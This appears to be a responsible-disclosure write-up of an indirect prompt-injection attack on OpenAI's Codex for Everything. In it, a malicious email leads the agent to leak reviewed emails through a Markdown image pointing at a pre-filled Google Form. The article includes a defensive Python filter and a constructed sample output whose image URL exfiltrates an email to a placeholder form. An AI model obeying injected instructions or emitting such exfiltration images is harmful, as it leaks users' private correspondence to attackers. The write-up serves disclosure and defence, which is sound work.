Codex Exfiltrates Connector Data



Codex for Everything Exfiltrates Connected Data

Overview

‘Codex for Everything’ is an update to Codex that extends it beyond coding to day-to-day tasks. It adds over 90 new plugins and features, such as ‘browser use’ and ‘computer use’, that turn Codex into a general-purpose agent positioned against Anthropic’s Claude Cowork and Microsoft’s Copilot Cowork.

In this article we demonstrate that a single malicious email could manipulate Codex for Everything into exfiltrating the complete contents of the other emails Codex was reviewing. Exfiltration occurred by outputting a Markdown image whose URL was a pre-filled Google Form submission link; loading the image triggered an automatic submission to the attacker-controlled form.

We demonstrate the vulnerability via an indirect prompt injection in an untrusted email, but an injection in any untrusted data source Codex reads could trigger the same behavior across Codex use cases.

This vulnerability was responsibly disclosed on April 21, 2026, and has been remediated by OpenAI. Details of the responsible disclosure are at the end of the article.

The Attack Chain

1. A user asks Codex for help reviewing emails

Screenshot: the user asks Codex for Everything to triage their emails.

OpenAI's Email plugin ships with a Skill for triaging emails, and reviewing emails is one of the demonstrated use cases in the Codex for Everything release.

2. A prompt injection is hidden in one of the emails Codex finds

The user's inbox contains an email from an external party that includes a prompt injection.

Screenshot: the user receives an email containing a prompt injection.

The email's content is not displayed to the user during Codex's review process, so the injected instructions are never seen by the user.

3. Codex is manipulated to output an insecure image, triggering data exfiltration

Codex is manipulated into generating and outputting Markdown image syntax whose URL is a pre-filled Google Form submission link populated with the victim's email data. Because the client fetches image URLs as soon as the response is rendered, this automatically submits the victim's emails to an attacker-controlled Google Form. No user interaction is required beyond submitting the initial email triage query.

Screenshot: Codex outputs a malicious image that exfiltrates data.

4. The attacker can view the victim's emails in their Google Form submissions

This attack exfiltrated sensitive emails, including legal correspondence, organizational financial planning, and security-related notifications.

Screenshot: data exfiltrated from Codex appears in the attacker's Google Form responses.
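The exfiltration channel in step 3 is generic: a Markdown image in agent output is fetched by the renderer without a click, so whatever the model writes into the image URL leaves the session. The check below is an added example written for this page, not PromptArmor's or OpenAI's code. It scans agent output for inline Markdown images whose host is outside an allowlist, reports how much data each URL's query string carries, and rewrites those images to inert text before rendering. The allowlisted host, the FORM_ID placeholder, the entry field number and the sample email are constructed for the example; the URL shape follows the public pre-filled Google Forms link format.

```python
import re
from urllib.parse import urlsplit, parse_qsl, quote

# Markdown inline image: ![alt](url "optional title"). Reference-style
# images and raw <img> tags are out of scope for this example; a production
# filter should walk the parsed Markdown/HTML tree rather than use a regex.
MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*(\S+?)(?:\s+"[^"]*")?\s*\)')

# Hosts the renderer may fetch images from. An allowlist, not a blocklist:
# the attacker chooses the destination, so only known-good origins pass.
# (Constructed for this example.)
ALLOWED_IMAGE_HOSTS = {"images.example-internal.net"}


def find_image_exfil(markdown, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Return one finding per inline image whose URL would be fetched from a
    host outside the allowlist when the Markdown is rendered."""
    findings = []
    for m in MD_IMAGE.finditer(markdown):
        url = m.group(2)
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https"):
            continue  # data:/relative references do not reach the network
        host = (parts.hostname or "").lower()
        if host in allowed_hosts:
            continue
        params = parse_qsl(parts.query, keep_blank_values=True)
        findings.append({
            "url": url,
            "host": host,
            "param_count": len(params),
            # decoded bytes of the query-parameter values: the exfiltrated payload
            "payload_bytes": sum(len(v) for _, v in params),
        })
    return findings


def neutralize_images(markdown, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Rewrite every non-allowlisted inline image as inert text so that
    rendering the output performs no outbound request."""
    def replace(m):
        parts = urlsplit(m.group(2))
        host = (parts.hostname or "").lower()
        if parts.scheme in ("http", "https") and host in allowed_hosts:
            return m.group(0)
        return "[image blocked: %s]" % (host or "non-http source")
    return MD_IMAGE.sub(replace, markdown)


# Constructed sample: an email the agent was reviewing, and agent output in
# which an injection has placed that email into a pre-filled Google Form link
# (FORM_ID and entry.1234 are placeholders, not a real form).
SAMPLE_EMAIL = "Subject: Q3 budget\nFrom: cfo@victim.example\nHeadcount freeze until Nov."
SAMPLE_AGENT_OUTPUT = (
    "Inbox summary:\n"
    "1. Q3 budget (CFO): headcount freeze until November\n\n"
    "![status](https://docs.google.com/forms/d/e/FORM_ID/viewform"
    "?usp=pp_url&entry.1234=" + quote(SAMPLE_EMAIL) + ")\n"
    "![logo](https://images.example-internal.net/logo.png)\n"
)

if __name__ == "__main__":
    for f in find_image_exfil(SAMPLE_AGENT_OUTPUT):
        print("exfil image -> %s, %d params, %d payload bytes"
              % (f["host"], f["param_count"], f["payload_bytes"]))
    print(neutralize_images(SAMPLE_AGENT_OUTPUT))
```

The allowlist is the important design choice: a blocklist of form hosts cannot keep up, because the attacker can point the image at any server they control and encode the data in the path rather than the query string. Running the filter on the rendered output is a last line of defence; the same rule belongs in the client that renders agent responses, which should fetch images only from trusted origins or not at all.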

Responsible Disclosure

This vulnerability was responsibly disclosed on Apr 21, 2026, and has been remediated by OpenAI.

Timeline

Apr 21, 2026: PromptArmor discloses to OpenAI via HackerOne
May 6, 2026: HackerOne requests additional details
May 6, 2026: PromptArmor follows up
May 14, 2026: HackerOne validates and triages the vulnerability
May 21, 2026: Public disclosure



